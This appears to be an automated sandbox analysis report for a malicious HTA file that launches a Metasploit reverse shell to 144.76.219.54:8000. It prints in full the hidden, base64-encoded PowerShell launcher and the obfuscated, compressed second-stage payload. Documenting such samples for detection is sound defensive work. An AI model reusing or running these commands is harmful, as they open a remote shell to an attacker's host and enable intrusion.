Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 18:31
Static task
static1
Behavioral task
behavioral1
Sample
568178389480e9f8368e66d811b105fe.hta
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
568178389480e9f8368e66d811b105fe.hta
Resource
win10v2004-20240508-en
General
-
Target
568178389480e9f8368e66d811b105fe.hta
-
Size
7KB
-
MD5
568178389480e9f8368e66d811b105fe
-
SHA1
34c19d4b6bc99440b30ee9922a566ded9bd7a287
-
SHA256
5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e
-
SHA512
7bf3b91350ad635543cb92167d3e0b28d7d51164b8da040ea0740e672bfdad7d4242b25ba42b12a1c4cd266cbf44fa1ae6b8c34b01eea61ffa3687e8fd06e9ed
-
SSDEEP
192:gn2jh1hqT2TsQL36ANDaqkvhYXMl9tKTsQGF6hd9d:gn2jh1hszMLBa5vhB94Tl1hd9d
Malware Config
Extracted
metasploit
windows/shell_reverse_tcp
144.76.219.54:8000
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 2 2632 powershell.exe 2 2632 powershell.exe 2 2632 powershell.exe 2 2632 powershell.exe 2 2632 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 3064 powershell.exe 2632 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 3064 powershell.exe 2632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 3036 wrote to memory of 3064 3036 mshta.exe powershell.exe PID 3036 wrote to memory of 3064 3036 mshta.exe powershell.exe PID 3036 wrote to memory of 3064 3036 mshta.exe powershell.exe PID 3036 wrote to memory of 3064 3036 mshta.exe powershell.exe PID 3064 wrote to memory of 2632 3064 powershell.exe powershell.exe PID 3064 wrote to memory of 2632 3064 powershell.exe powershell.exe PID 3064 wrote to memory of 2632 3064 powershell.exe powershell.exe PID 3064 wrote to memory of 2632 3064 powershell.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\568178389480e9f8368e66d811b105fe.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAQwBpAHYAZwBtAFUAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvAHcAYQBvAHMAMgBaAFkASQBiACsARwBhAEoAbABLAGwAcwAzAGsASgBKAHAAaABBAEgARQB5AEEAbwB0AE4AaQByADgAMwBDADIAawB2AHQAZABYAGoAcAA5AGIALwBmAEwATgBnAGgAdgBTAFIAMwB2AFoATwA2AEUAcwBLAGUAbgBaAG0AZABmAGUAYQBaAEcAZgB0AHAANQBIAEwAQwBJAGkAawBjAGQANgBSAHYANwA5ADkASgAyAGUAcQBqAEcASQBXAFMASwBzAGUAVABmAHQAYwB2AFMASABMAHEATgBiAFQAVAByAHMAeAA2ADAAbQBkAEoAbgBlAHIAcgBkAFkATwBGAGkARQBTAHoAcQA2AHQANgBHAHMAYwA0ADQAcwBmADMAJwAnACsAJwAnADQAagBYAG0AZQBwAEwAZwBjAEUANABKAFQAbABSAE4AKwBsAE0AYQBMAFgAQwBNAHoAMgA3AG4AUwArAHgAeQA2AFoAcwBrAC8AMQBHADgAcABtAHkATwBhAEsAYQAyAHEAeQBOADMAZwBhAFUAegB7ADAAfQBmAEwARQBYAHAAZQA1AFMATQBSAFYAdABOAGUAJwAnACsAJwAnAFUAYwBGAFgANQA4AGsAWABSAHAAbQBlAFYAVwBiAEgANQBOAFUAVQAwAFUAUgBWADcAbAAzAEEAYwBGAGoAMQBLAEYAVQAzADYAcgBvAGsARAA3ADMAZAByAHIAQwBvAFcAYwBXAE8AVwBNAEoAOABYAFIAeQAnACcAKwAnACcAUQA2AHIAeABhAEgAVQBZAEoAOAAzAEEATgB2AGoAOQBqAEMAZgBNAEcAOABSAEkARwByAG4AQwA0AFQAWQA1ADcARwBrAGIAaQBUAGMASABKAFUAVQBSAFYANAA3AE0AZgBNADEAVAAwAHYAeABrAG0AaQBGAEsAUwBwAGMARAArAGQAegBYADUAWABwADkAbgBaAGQAMgBuAEUAUwBZAGkATABaAHMAUgB4AHoATgBZADIAagBoACsASgBpADUATgBpAEcAMABVAGUAeABYAGYAWQBuADQARwBWAHoAVwBNAFMAQgBUAE4ATgBBADcAVgBIAHQAcwBLAHEAJwAnACsAJwAnAEgASwBXAFUARgBxAFQALwA0AGsAYgB0ADQAVQAyAE8AMwBNADgAYQBxAGMAKwBOAFEASwB2AHsAMAB9AFkANgAwAEEAQwBYADEAeABTADQAdAA1AEsAYwBWAEgATwArAFcAVgBNAEkAOABVADAARwBCAGwATgBBAEQAdwB2AGcAdgA4AC8ASgB3ADYATABKAHkALwBRAHAAMgBUAEkARgAvAFQAdwB3ADYARwBnAE4AVQArAFMAOABqAEIAOQByAE4AVQBMAGsAZwBXAEgASQA0ADQAaQAzAGYAdwBLAHQALwBIAEsAZABaAG0AVAAzAEIATABjAG4ASwB7ADAAfQBDAGoALwByAHIASgBKAGIAZwBsADIANABCAE0ASABVAFkAYwBTAGIAbgBjAHgALwB5AEwAdwBjAEoAYwB7ADEAfQBvAEwANwBUAGUASgBuAEkARAArAHkAVABDAGoAVgAyAEUAUQB7ADEAfQBMAG0AWABGAFYAZgB5AHcAagAyAEsAVAA0AEEAVQBzAHoAVgBlAGgAQwBnAHEAbQBRAGIAMgBHAHQAZwBpAGcAewAwAH0ARQBCAGMAcQBDAEcAQwAvAE0AbQBpAEgAaABUADcAWgBHAFMAcQBpAEgAWQA5ADIARgByAEMAWQBRACcAJwArACcAJwBGAFMAUgBjACsAegBHAFkAWQArAEoAVQB4AFkAdwBzAEgAQQBKADQAeAAzAGQAZwBxAHsAMQB9AHgARABoAGUAQgBjAE8AJwAnACsAJwAnADYAewAxAH0ASwBYAFgANgA2AGUAQQBjAGwAcABVADUAUgBrAGgAUwBrAGYAZwBvAGwANgBoAFkAawBHAHkATwBLAHYAWQBLACcAJwArACcAJwBrAFIAdwBuAEoAdAB2AFMAVQBzADgATwBqAGMAZwByAFgAUwBpAGsAbgBMAGsAcAA0ADcAbQA2AG0ALwBSADMAewAwAH0ANwBOAHcANgBpAHgASQBlAHAAeQA3AGsARgBUAEMANAB0ADkAZgBZAEoAWQBnAEsAUwBBAHAAUwBtADMAagBZADIATgBrAGsAeQBNADkAWABYAGcAVwBrAGoAaQBpAEYAJwAnACsAJwAnADQAZwBGAHsAMAB9AGoANQBBAFEAawBBAGcAZwBiAEMANwBZAEUAawBPAG8AZwBoAGwAYQAwAGMAYgBjAEQATgBjAFUAaAA2AEIAeQBhAEIAawB0AGkAZwBKAG8ARQBGAG0ARgBIAE4AaQBGAEEAewAxAH0AdwBwAGIAdwBXAGEAMQAnACcAKwAnACcAOABLAFIAKwBBAEsAYQBIAEoATgBuAFkAVQBLACsAYgBjAHAANABRAFgASgBJAHoASwBFAEQAQwBaAGoARAA1AGYAKwBKADQAVwBYAGoATwBRAFoAVABqADMARwBXAEgAVABXAHYAcwBLAG0AeAA0ADYASQBHAFoATwBJAEsAawBtAFkAQQBIAGUAQwBJAE8AVQBEAFIAaQBsAGwAbwBvAEEAUgAvAHIAQgAyADcAagB7ADAAfQBxAGgAZABFAHYAcQBPAHEAeQB4AEcAVgBIAEwATgBWAGEAawBvAG0AOQBJAHgAYgBUAGcATgB5AFQAbgBKAG0AdABjAGUARABlAGQAWgBiAHMAVQAnACcAKwAnACcATgA3AFkATABYAHoAYwBUADAAMgByADMARwA0AE4AMgB7ADEAfQAvAGIAWQBzAFoAMABhAHQANQBzAG0AdgArAG0AYgAzAEcAbwArAEwASgBlADIAMwAnACcAKwAnACcAcgA0AGIAagB2AG4ARQAnACcAKwAnACcAMQBOAHYAMwBwAEwAdwBhADEALwBiAHIARAB0AG4AYgBYAGQAMABiAGIAMABzAGYAOQA4AFoAKwBVAHoAYQAyACsAMgBYAGcAKwBlAE8ARwA3AHcAYwBYAHYAbgAxAFgAKwBhADEARgB7ADEAfQBxAHsAMAB9ADYAdwBDAGgAWABVAGIAZgBSAFQATABzAGoAWQAnACcAKwAnACcAMgBPAFUAYQAnACcAKwAnACcAMABtAFQAYgBOAG8ARABNAGgAeQBzAE8AaQAwACsASAB6AHMAVQBEAGYAMQBTADgARgBDADUAUgBHAFQAYgBqAFoAZABPAGgAVgBsADcAVQA5AGUAdgBGACsAZgB7ADEAfQB2AHsAMQB9AE0ANwAxAHcAdgBMACcAJwArACcAJwAyADQAMwBiAHAAYwB0AFIAYgBhAFUAMwBkAGIAMABlAE4AWgAyAFcAdwBXADcARwBSAHEAegAzAFMAOAA2AHcAWgBRAHkARwBUAFcATQB3AEEATgBuAEgAbwBPAFQAWABRAEUAYQByAHIASQBVADYAaABsAFgAZABUADUAZwBlADYAewAwAH0ANwBBAGoARQBLADAATQBFAFoATwBsAFUAegBXAEQAMwBjAEwAOABOAFcAQwBFAEsAeABTAHsAMQB9AFcAWgA2AGUATQBzACsAZABVAGYARQBlAFMAdwA1ADYATAByAEgASgAzAHEAOQBVADYAdAA0AEQAOAA2ACsAWABVAFcATAB6AHMAUgBKAHsAMQB9ADUAZQBUAHgARwB0ADIAJwAnACsAJwAnAEcAaAB0AEQASAAxAGUAYQBIAGEATgB4AHIAVABmAHYAaABzAHsAMAB9AFcAWgBPAFMAcwBKAHEATgA3AE8AaABrAE4ASwB4AE8ARwAzAFUAMQBwAEEAVAA0AEkATgBtADYAZAAxAGIAeABrAFgAUQBmAG0AWQBsAHMASgA0AEsAeQBMAGcALwArAFEAaABIAFIAZQA5AFUAcQBYAHcAMAA5AEcAdABMAGsASgArAG8AKwBCAE4AeABoAGQAMwBHADEANwB7ADEAfQAzAG0AVgA2AGMATgBTAHkAJwAnACsAJwAnAGYAawBBAHEAWgA0AE8AUwBjAFQAewAwAH0AcQB6AE0ANQB0AFMAcQArAGEASQBqAHYAMwA4AG4AegBoADMAMwB2AFcAYwByAGYANgB2AFkAVwBpAHAATQBGAG8AawBBAEYAYQBPAFIANQBSAGIAWgBZADMATQBwAGEAYwA1ADgAUgBZAGEARwBxAFkAcgBxAHYAYwBCAHgAaABDACcAJwArACcAJwBoAE0AUgBaAG0AWgBPAFkANQAxAFMANQBvAHEANQBJAEgAbwA0AGoASwBUAGoAbwBCAEIAegBhADIAZwBlAGcAbgByAHQAUwBaAE8AZQBGAEwAWABUAHcATQBoAEYAVgAxAGMAVABpAEIARQBxAGcANwBqAEYATABvADQAQwB2AGkAaQBVAHQAKwBmAGwATQB2AFQANQA4AHIAWgBjAE8AMQBUAEEAegA5ACsAcgB6AHQAWQA3AFYAUgBiAEYAQwB7ADAAfQBZAEgAVwBJADYAZQA2AGMARQB6AE8AQwBPACcAJwArACcAJwArAHAASwBxAC8ASABDAGYANABGAE8ARABRAGwATgA1AEUANgBpADMAUQA0AE8AUQBWAHQAQgBEAG8AYQBjAGYAQwBGAHQAQQBaAGoATgBIAG4AdwBHAFcAMwBlAHEATABCAEMAVABjAEEAcgBBAEwAWABuAG8AcAB2AGcAQQBNADcAdwB7ADAAfQA0AE0AZgA1AFYAawBMAG0AYgBrADgANQBrAHIAcAB5ADEAagAvAGsAcwBKAGsANwBXAG4AQgBmAHgANQAvADAASwBZAGsAKwB3AGYAZABuACsASwBSAE8AWABDAEUAWgB3AFgANABoADgARgB6AHoAcgA3AHIAdwBOAGcAaABBAGcASABSAFIAdgA2AEwATQBYAEgAMABmADgAcQBEAGwAbQBOAHsAMAB9AE0AewAxAH0AdgB5AEEAMwBVAGcASgA4AHQAOABUAEYAOABtAC8ASwB6AEgAbgB4AGcASABSAHIAOQBYADAASABoAFMATQB7ADEAfQBFAEMAdwBBAEEAJwAnACkALQBmACcAJwBQACcAJwAsACcAJwB1ACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIACivgmUCA7VWbW/aSBD+Xqn/waos2ZYIb+GaJlKls3kJJphAHEyAotNir83C2kvtdXjp9b/fLNghvSR3vZO6EsKenZmdfeaZGftp5HLCIikcd6Rv799J2eqjGIWSKseTftcvSHLqNbTTrsx60mdJnerrdYOFiESzq6t6Gsc44sf3'+'4jXmepLgcE4JTlRN+lMaLXCMz27nS+xy6Zsk/1G8pmyOaKa2qyN3gaUz{0}fLEXpe5SMRVtNe'+'UcFX58kXRpmeVWbH5NUU0URV7l3AcFj1KFU36rokD73drrCoWcWOWMJ8XRy'+'Q6rxaHUYJ83ANvj9jCfMG8RIGrnC4TY57GkbiTcHJUURV47MfM1T0vxkmiFKSpcD+dzX5Xp9nZd2nESYiLZsRxzNY2jh+Ji5NiG0UexXfYn4GVzWMSBTNNA7VHtsKq'+'HKWUFqT/4kbt4U2O3M8aqc+NQKv{0}Y60ACX1xS4t5KcVHO+WVMI8U0GBlNADwvgv8/Jw6LJy/Qp2TIF/Tww6GgNU+S8jB9rNULkgWHI44i3fwKt/HKdZmT3BLcnK{0}Cj/rrJJbgl24BMHUYcSbncx/yLwcJc{1}oL7TeJnID+yTCjV2EQ{1}LmXFVfywj2KT4AUszVehCgqmQb2Gtgig{0}EBcqCGC/MmiHhT7ZGSqiHY92FrCYQ'+'FSRc+zGYY+JUxYwsHAJ4x3dgq{1}xDheBcO'+'6{1}KXX66eAclpU5RkhSkfgol6hYkGyOKvYK'+'kRwnJtvSUs8OjcgrXSiknLkp47m6m/R3{0}7Nw6ixIepy7kFTC4t9fYJYgKSApSm3jY2NkkyM9XXgWkjiiF'+'4gF{0}j5AQkAggbC7YEkOoghla0cbcDNcUh6ByaBktigJoEFmFHNiFA{1}wpbwWa1'+'8KR+AKaHJNnYUK+bcp4QXJIzKEDCZjD5f+J4WXjOQZTj3GWHTWvsKmx46IGZOIKkmYAHeCIOUDRillooAR/rB27j{0}qhdEvqOqyxGVHLNVakom9IxbTgNyTnJmtceDedZbsU'+'N7YLXzcT02r3G4N2{1}/bYsZ0at5smv+mb3Go+LJe23'+'r4bjvnE'+'1Nv3pLwa1/brDtnbXd0bb0sf98Z+Uza2+2Xg+eOG7wcXvn1X+a1F{1}q{0}6wChXUbfRTLsjY'+'2OUa'+'0mTbNoDMhysOi0+HzsUDf1S8FC5RGTbjZdOhVl7U9evF+f{1}v{1}M71wvL'+'243bpctRbaU3db0eNZ2WwW7GRqz3S86wZQyGTWMwANnHoOTXQEarrIU6hlXdT5ge6{0}7AjEK0MEZOlUzWD3cL8NWCEKxS{1}WZ6eMs+dUfEeSw56LrHJ3q9U6t4D86+XUWLzsRJ{1}5eTxGt2'+'GhtDH1eaHaNxrTfvhs{0}WZOSsJqN7OhkNKxOG3U1pAT4INm6d1bxkXQfmYlsJ4KyLg/+QhHRe9UqXw09GtLkJ+o+BNxhd3G17{1}3mV6cNSy'+'fkAqZ4OScT{0}qzM5tSq+aIjv38nzh33vWcrf6vYWipMFokAFaOR5RbZY3Mpac58RYaGqYrqvcBxhC'+'hMRZmZOY51S5oq5IHo4jKTjoBBza2gegnrtSZOeFLXTwMhFV1cTiBEqg7jFLo4CviiUt+flMvT58rZcO1TAz9+rztY7VRbFC{0}YHWI6e6cEzOCO'+'+pKq/HCf4FODQlN5E6i3Q4OQVtBDoacfCFtAZjNHnwGW3eqLBCTcArALXnopvgAM7w{0}4Mf5VkLmbk85krpy1j/ksJk7WnBfx5/0KYk+wfdn+KROXCEZwX4h8Fzzr7rwNghAgHRRv6LMXH0f8qDlmN{0}M{1}vyA3UgJ8t8TF8m/KzHnxgHRr9X0HhSM{1}ECwAA')-f'P','u')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD54d8baa261134681987f4065c5a93d6e0
SHA12367972d747d1e244eefe73acd56b7402c217c27
SHA256e9715e3ef203e324e3afff3404777c965b7a44dab1c286b065318780d9e1edd6
SHA5129281cd6360ac4e0e99221d0fbe3a9c54d9a646204108e8daada6b85248bfea184b08dfce9ba1fefa8f61728aaf2aa9d927d580ce20b5ac72309360f0cd6da452
-
memory/2632-7-0x0000000005630000-0x0000000005631000-memory.dmpFilesize
4KB